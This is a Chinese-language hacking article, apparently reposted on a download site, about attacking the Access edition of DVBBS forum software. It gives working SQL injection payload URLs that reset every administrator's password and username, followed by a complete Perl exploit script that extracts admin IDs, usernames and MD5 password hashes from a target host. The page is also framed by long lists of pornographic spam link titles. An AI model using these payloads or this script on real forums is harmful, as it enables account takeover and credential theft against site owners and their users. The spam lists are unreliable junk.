亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來(lái)到蟲(chóng)蟲(chóng)下載站! | ?? 資源下載 ?? 資源專(zhuān)輯 ?? 關(guān)于我們
? 蟲(chóng)蟲(chóng)下載站

?? 絕對(duì)背后的微笑.txt

?? 黑客的指令
?? TXT
字號(hào):
>>>Dedicated This Scrap To CaoJing & GuTing<<<

Envymask的睿智幫我解決了很多問(wèn)題,盡管是兄弟,我還是要說(shuō)謝謝。

很吃驚地看到了DVBBS發(fā)布的安全補(bǔ)丁,原來(lái)有人提醒了作者程序所存在的一類(lèi)漏洞。可以看出,作者對(duì)DVBBS做了全面檢測(cè),并且在消除那一類(lèi)漏洞的同時(shí),也順帶消除了其他幾個(gè)安全隱患。看到自己曾耗費(fèi)數(shù)小時(shí)換來(lái)的“勞動(dòng)成果”被作者解決,心中有點(diǎn)不快。

有人、文章錯(cuò)誤地認(rèn)為:動(dòng)網(wǎng)即使存在漏洞,也只能真正威脅MSSQL版;而ACCESS版的用戶敏感信息MD5加密和后臺(tái)管理的SESSION+COOKIE驗(yàn)證則讓大家認(rèn)為它牢不可破:“頂多讓你得到MD5加密后的密碼,你還能做什么呢?”、“我們只有暴力破解”、“動(dòng)網(wǎng)已經(jīng)是非常安全的程序了”...在一個(gè)失落的清晨,我偶然發(fā)現(xiàn)了這位親愛(ài)的朋友,她靜靜地站在絕對(duì)的背后,微笑...

因此,本文展示如何攻破“所謂安全”的ACCESS版DVBBS;由于MSSQL版的漏洞利用簡(jiǎn)單乏味,拒絕介紹。另外,請(qǐng)相關(guān)朋友速打補(bǔ)丁。

攻擊分兩步,首先得到管理員MD5加密的敏感信息,接著在此基礎(chǔ)上更改后臺(tái)管理員密碼。

一:得到任意用戶MD5加密的敏感信息
可以利用 logout.asp、messanger.asp、myfile.asp...等一大批文件所存在的Sql Injection漏洞達(dá)到目的。這些漏洞文件中l(wèi)ogout.asp讓我稍感新意,選它來(lái)說(shuō)明問(wèn)題:
logout.asp:
/--------------------------------------------------------------------------
<!--#include file="conn.asp"-->

<!--#include file="inc/const.asp"-->

<%
dim activeuser
membername=request.cookies("aspsky")("username")
if session("userid")<>"" then
activeuser="delete from online where id="&session("userid")
Conn.Execute activeuser
end if
if membername<>"" then
activeuser="delete from online where username='"&membername&"'"
Conn.Execute activeuser
end if
Response.Cookies("aspsky").path=cookiepath
Response.Cookies("aspsky")("username")=""
Response.Cookies("aspsky")("password")=""
Response.Cookies("aspsky")("userclass")=""
Response.Cookies("aspsky")("userid")=""
Response.Cookies("aspsky")("userhidden")=""
Response.Cookies("aspsky")("usercookies")=""
session("userid")=""
conn.close
set conn=nothing
response.redirect("index.asp")
%>
/--------------------------------------------------------------------------
問(wèn)題語(yǔ)句: activeuser="delete from online where username='"&membername&"'"
很多人會(huì)問(wèn):這也能利用?
能!
步驟:
1:注冊(cè)一用戶并登陸;
2:在COOKIE中構(gòu)造membername請(qǐng)求logout.asp,以圖程序所執(zhí)行的SQL查詢語(yǔ)句中包含我們利用邏輯關(guān)系添加的子語(yǔ)句;
3:構(gòu)造參數(shù)請(qǐng)求主頁(yè)面,如返回頁(yè)面包含用戶注冊(cè)名,重復(fù)第 2 步;
4:得到敏感信息。

測(cè)試程序附后。

二:闖入后臺(tái)管理
我們已經(jīng)得到管理員MD5加密的敏感信息,現(xiàn)在可以利用COOKIE欺騙可以在前臺(tái)執(zhí)行管理員操作。如果你依然堅(jiān)持暴力破解,并認(rèn)為這很有趣,你可以停止閱讀本文了。

鄙視暴力破解。不是說(shuō)不現(xiàn)實(shí),而是說(shuō)這很乏味。

admin_recycle.asp
/--------------------------------------------------------------------------
...
topicid=request("topicid")
if request("action")<>"清空回收站" then
if topicid="" or isnull(topicid) then
Errmsg=Errmsg+"<li>"+"請(qǐng)選擇相關(guān)帖子后進(jìn)行操作。"
Founderr=true
end if
end if
if request("tablename")="topic" then
tablename="topic"
elseif instr(request("tablename"),"bbs")>0 then
tablename=request("tablename")
else
Errmsg=Errmsg+"<li>"+"錯(cuò)誤的系統(tǒng)參數(shù)!"
Founderr=true
end if
if not master then
Errmsg=Errmsg+"<li>"+"您不是系統(tǒng)管理員或者您還沒(méi)有登陸。"
Founderr=true
end if
...
'還原回收站內(nèi)容
sub redel()
dim tempnum,todaynum
if instr(tablename,"bbs")>0 then
sql="update "&tablename&" set locktopic=0 where Announceid in ("&TopicID&")"
conn.execute(sql)
...
/--------------------------------------------------------------------------
問(wèn)題:
1:未采用SESSION認(rèn)證
2:topicid沒(méi)有過(guò)濾
3:僅要求tablename包含bbs而不采取其他任何過(guò)濾(目前依然未修正)

Tablename和TopicID前后呼應(yīng),真是天合之作。提交

http://www.psych.com/d6/admin_recycle.asp?action=還原&topicid='%20where%20id%20in%20(9&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs

實(shí)際執(zhí)行的是

update admin set [password]='ef7813118e77b0ee', lastloginip='bbs set locktopic=0 where Announceid in (' where id in (9)

這樣,ID為 9 的后臺(tái)管理員的密碼就被修改為 ilikecat (ef7813118e77b0ee)。

提交如上URL后,頁(yè)面會(huì)返回出錯(cuò)提示。這是因?yàn)楹竺娴腟QL語(yǔ)句有語(yǔ)法錯(cuò)誤,別管它,我們要求執(zhí)行的語(yǔ)句已經(jīng)在它之前“正確”執(zhí)行了。

注意:前臺(tái)管理員和后臺(tái)管理員是一一對(duì)應(yīng)的,弄錯(cuò)了不能正確登陸后臺(tái)。為了省事,你可以:

http://www.psych.com/d6/admin_recycle.asp?action=還原&topicid='%20where%20(1=1&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs

所有后臺(tái)管理員密碼修改為 ilikecat (ef7813118e77b0ee)

http://www.psych.com/d6/admin_recycle.asp?action=還原&topicid='%20where%20(1=1&tablename=admin%20set%20username='catlikeme',lastloginip='bbs

所有后臺(tái)管理員用戶名修改為 catlikeme 

當(dāng)然,最好不要無(wú)聊到把所有注冊(cè)用戶的帳號(hào)和密碼全修改了。

OK,本地COOKIE做些處理后,勞請(qǐng)使用 catlikeme/ilikecat 登陸后臺(tái)進(jìn)行“管理”。

/--------------------[獲取任意用戶MD5加密信息的測(cè)試程序:

#!/usr/bin/perl
#Codz By PsKey<PsKey@hotmail.com>
#Exploit of DVBBS's logout.asp

#-------------------------------------------------------------------------- 
# 本腳本針對(duì)動(dòng)網(wǎng)論壇logout.asp文件缺陷而寫(xiě),可以推算出所有用戶
# MD5加密密碼;另外可以自動(dòng)破解后臺(tái)管理員ID、username、password
# 腳本參照最新版本編寫(xiě),若低版本出現(xiàn)不能用的情況,請(qǐng)自行修改程序
# 腳本利用方法:
# 1:在目標(biāo)論壇以 ilikecat/catlikeme 注冊(cè)一用戶,并得到此用戶的 userid
# 2:再另注冊(cè)一任意用戶(此步不可少)
# 3:運(yùn)行腳本,按幫助輸入命令參數(shù)
# 如果是MSSQL版,請(qǐng)把這段糟糕的腳本扔到一邊
#--------------------------------------------------------------------------

$|=1;
use Socket;
use Getopt::Std;
getopt('hpwium');

print "\n ===================================================\n";
print " Exploit of DVBBS's logout.asp\n";
print " Codz By PsKey<PsKey\@hotmail.com> \n";
print " www.isgrey.com && c4st.51.net \n";
print " Thanx Envymask<130\@21cn.com> \n";
print " ===================================================\n";

&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));

$host=$opt_h;
$port=$opt_p||80;
$path=$opt_w;
$userid=$opt_i;
$user=$opt_u;
$mode=$opt_m;

if ($opt_m eq "p") {
&usage unless defined($opt_u);
print "\nPlease wait...\n\n";
for ($j=1;$j<=16;$j++) {
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
&first;
for ($i=0;$i<@dic;$i++) {
print "$dic[$i]";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$j.th;
print "\n\/\/------------The $th word of the password is $dic[$i]";
$pws=$pws.$dic[$i];
last;
}
}
}
print "\n\nSuccessful,the full password of $user is $pws.\n";
}

elsif ($opt_m eq "b") { 

#Crack ID
print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
print "\n--------->>There is one admin's id $i";
push (@id,$i);
&first;
}
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";
sleep(2);

#Crack the length of admin's username
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";
for ($j=0;$j<@id;$j++) {
print " \|\-\>cracking username's length which id is $id[$j] ...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
print "\n--------->>The length of $id[$j] is $i";
push (@len,$i);
&first;
last;
}
}
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";
sleep(2);

#Crack admin's username
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";
@dic1=(0..9);
@dic2=(a..z);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " \|\-\>cracking username which id is $id[$j] ...";
OUTER: for ($k=1;$k<=$len[$j];$k++) {
&first;
USERNAME: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
$pws=$pws.$dic[$i];
last USERNAME;
}
if ($dic[$i] eq "z") {
print "\ni can't crack this admin's name,maybe it is chinese.\n";
push (@user,"\?");
last OUTER;
}
}
}
push (@user,$pws);
print "\n========>>The username is $pws which id is $id[$j]\n";
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";
sleep(2);

#Crack admin's password
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print " \|\-\>cracking password which id is $id[$j] ...";
for ($k=1;$k<=16;$k++) {
&first;
PASSWORD: for ($i=0;$i<@dic;$i++) {
print "$dic[$i].";
$key=$pws.$dic[$i];
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/) {
$th=$k.th;
print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
$pws=$pws.$dic[$i];
last PASSWORD;
}
}
}
push (@pass,$pws);
print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
}
print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";
print "We got them now:\n";
printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
for ($i=0;$i<@id;$i++) {
printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
}
}

else {
&usage;
}

sub first {
$str="username=ilikecat&password=catlikeme&CookieDate=1";
$len=length($str);
$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
"Referer: http://$host$path/login.asp\n".
"Host: $host\n".
"Content-Length: $len\n".
"Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
"\n".
"$str\n\n";
print "\n.";
sendraw($req);
$req0 = "GET $path/index.asp HTTP/1.0\n".
"Referer: http://$host$path/index.asp\n".
"Host: $host\n".
"Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
print ".\n";
sendraw($req0);
}

sub second {
$req1 = "GET $path/logout.asp HTTP/1.0\n".
"Host: $host\n".
"Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
print ".";
@res = sendraw($req1);
$req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
"Referer: http://$host$path/index.asp?action=show \n".
"Host: $host\n".
"Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
print ".";
@in = sendraw($req2);
}

sub usage {
print qq~
Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>]
-h =hostname you want to attack
-p =port,80 default
-w =the web path such as "/dvbbs"
-i =the userid of ilikecat
-m =only two choice,b<background> and p<proscenium>(This option need -u)
-u =the user you want to crack
Eg: 1.Crack proscenium 
$0 -h www.target.com -p 80 -w /dvbbs -i 2 -m p -u admin 
2.Crack background
$0 -h www.target.com -p 80 -w /dvbbs -i 2 -m b
~;
exit;
}

sub sendraw { 
my ($req) = @_; 
my $target; 
$target = inet_aton($host) || die("inet_aton problems\n"); 
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); 
if(connect(S,pack "SnA4x8",2,$port,$target)){ 
select(S); 
$| = 1; 
print $req; 
my @res = <S>; 
select(STDOUT);
close(S); 
return @res;
}
else { 
die("Can't connect...\n"); 
}
} 


?? 快捷鍵說(shuō)明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號(hào) Ctrl + =
減小字號(hào) Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
高清成人免费视频| 国产综合成人久久大片91| 久久久久一区二区三区四区| 欧美精品乱码久久久久久按摩| 日本精品视频一区二区| 99re6这里只有精品视频在线观看 99re8在线精品视频免费播放 | 亚洲欧美激情在线| 欧美极品美女视频| 国产精品成人一区二区艾草| 国产精品久久午夜| 亚洲欧美日韩国产另类专区| 亚洲美女淫视频| 午夜久久久久久| 美日韩一区二区| 国产精品一区二区三区99| 精品一区二区三区免费播放| 国产精品一区久久久久| av激情成人网| 欧美日韩国产首页在线观看| 日韩欧美激情在线| 日本一区二区成人| 亚洲一区二区三区四区在线观看| 污片在线观看一区二区| 麻豆精品一区二区| www.亚洲激情.com| 欧美三区在线观看| 久久久国产综合精品女国产盗摄| 中文乱码免费一区二区| 一区二区三区在线不卡| 美女视频黄a大片欧美| 北条麻妃国产九九精品视频| 欧美视频在线不卡| 久久婷婷色综合| 亚洲综合色成人| 国产一区二区三区四| 色综合 综合色| 欧美电影免费观看高清完整版| 国产精品女主播在线观看| 亚洲午夜久久久久久久久久久 | 亚洲欧洲在线观看av| 一区二区三区高清不卡| 国产一区二区三区日韩| 精品视频一区三区九区| 久久午夜老司机| 亚洲曰韩产成在线| 国产成人8x视频一区二区| 欧美婷婷六月丁香综合色| 久久久国际精品| 日韩高清不卡一区二区三区| 99精品欧美一区二区蜜桃免费| 欧美一二三区在线观看| 亚洲在线中文字幕| 国产成人亚洲综合a∨婷婷| 久久久国际精品| 亚洲高清视频在线| 福利一区福利二区| 欧美一区在线视频| 一区二区三区蜜桃| 成人a级免费电影| 久久精品一二三| 久久精品免费看| 91精品国产一区二区人妖| 亚洲欧美乱综合| 色综合视频在线观看| 国产精品久久久一本精品| 久久99热99| 欧美mv日韩mv国产网站| 天天综合色天天| 欧美日韩精品电影| 一区二区不卡在线视频 午夜欧美不卡在| 国产在线乱码一区二区三区| 日韩无一区二区| 日本不卡一二三| 宅男在线国产精品| 日韩精品一二三区| 欧美一级一区二区| 秋霞成人午夜伦在线观看| 欧美日韩一区二区三区四区| 亚洲最大成人网4388xx| 欧美色倩网站大全免费| 午夜伦理一区二区| 日韩女优av电影在线观看| 美女视频网站黄色亚洲| 精品88久久久久88久久久| 精品亚洲欧美一区| 日本一区二区三区四区| 成人av资源在线观看| 亚洲蜜臀av乱码久久精品 | 天堂成人国产精品一区| 欧美乱妇23p| 青青青爽久久午夜综合久久午夜| 欧美一区三区四区| 激情综合色播五月| 国产欧美精品区一区二区三区| 成人精品鲁一区一区二区| 中文字幕不卡的av| 91国内精品野花午夜精品| 亚洲成人av免费| 欧美电视剧在线看免费| 懂色av一区二区三区免费看| 亚洲另类一区二区| 欧美日韩成人在线| 国产美女精品在线| 亚洲精品自拍动漫在线| 欧美肥妇毛茸茸| 国产成人午夜视频| 一区二区三区国产精品| 欧美成人video| 波多野结衣精品在线| 偷偷要91色婷婷| 久久精品免费在线观看| 色婷婷久久99综合精品jk白丝| 日本系列欧美系列| 国产精品三级在线观看| 欧美绝品在线观看成人午夜影视| 激情成人综合网| 亚洲一区中文日韩| 精品av综合导航| 欧美三级三级三级| 成人午夜又粗又硬又大| 日韩av中文字幕一区二区三区| 国产精品久久久久久亚洲毛片 | 国产日韩v精品一区二区| 在线观看亚洲成人| 国产一区 二区| 天天av天天翘天天综合网| 欧美激情一区二区在线| 91精品国产日韩91久久久久久| 国产91丝袜在线18| 奇米色777欧美一区二区| 亚洲色图制服丝袜| 久久久久久久久久久久电影| 欧美视频一区二区在线观看| 成人av在线看| 国产伦精品一区二区三区在线观看| 一卡二卡欧美日韩| 国产精品久久久久久久久搜平片 | 国内成人免费视频| 天天色综合成人网| 亚洲在线免费播放| 亚洲丝袜美腿综合| 久久久久久毛片| 日韩午夜激情电影| 欧美一级搡bbbb搡bbbb| 欧美日韩在线三区| 欧美亚洲禁片免费| 欧美在线小视频| 色综合久久99| 91免费视频大全| 91啪亚洲精品| 色先锋资源久久综合| 97国产一区二区| 色狠狠一区二区| 欧洲一区二区三区在线| 色老汉一区二区三区| 色欧美片视频在线观看| 色www精品视频在线观看| 色综合久久久久网| 欧美日韩久久不卡| 91精品国产丝袜白色高跟鞋| 欧美一区二区三区影视| 精品国产乱码久久久久久影片| 日韩欧美黄色影院| 久久综合九色综合欧美就去吻 | 2021国产精品久久精品| 欧美mv日韩mv国产网站app| 精品国产麻豆免费人成网站| 欧美激情一区二区在线| 亚洲素人一区二区| 亚洲一区二区五区| 麻豆国产欧美一区二区三区| 国产一区欧美二区| 91麻豆国产自产在线观看| 欧美专区亚洲专区| 日韩一区二区三区电影在线观看| 日韩欧美电影一二三| 欧美国产成人精品| 午夜精品在线看| 激情六月婷婷久久| 99久久99久久免费精品蜜臀| 欧美亚洲国产bt| 久久色中文字幕| 一区二区三区在线免费观看| 蜜臀av一级做a爰片久久| 风流少妇一区二区| 欧美在线观看视频一区二区三区| 91.xcao| 中文字幕免费观看一区| 亚洲成人精品影院| 国产91综合一区在线观看| 欧美日韩亚洲综合一区二区三区| 精品国产乱码久久久久久图片| 亚洲视频综合在线| 久久狠狠亚洲综合| 在线看国产一区| 国产欧美精品国产国产专区 | 成人sese在线| 日韩一区二区视频| 最新国产精品久久精品| 看电影不卡的网站|